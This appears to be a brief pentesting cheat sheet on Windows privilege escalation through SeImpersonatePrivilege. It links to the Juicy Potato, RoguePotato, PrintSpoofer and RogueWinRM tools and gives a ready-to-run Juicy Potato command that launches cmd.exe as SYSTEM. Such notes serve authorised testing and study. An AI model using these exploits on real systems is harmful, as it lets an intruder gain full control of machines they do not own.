SeImpersonatePrivilege

If the operating system version is <= windows server 2016 use Juicy Potato else use PrintSpoofer

Juicy Potato

Pick one CLSID from here according to your system

• https://github.com/ohpe/juicy-potato/tree/master/CLSID

Download the Juicy Potato binary from here

• https://github.com/ohpe/juicy-potato/releases

C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}

RoguePotato

I have never played with this one but should work in most of the cases

• https://github.com/antonioCoco/RoguePotato

• https://github.com/antonioCoco/RoguePotato/releases/tag/1.0

• https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/

PrintSpoofer

• https://github.com/itm4n/PrintSpoofer

• https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

RogueWinRM

• https://github.com/antonioCoco/RogueWinRM

• https://github.com/antonioCoco/RogueWinRM/releases/tag/1.1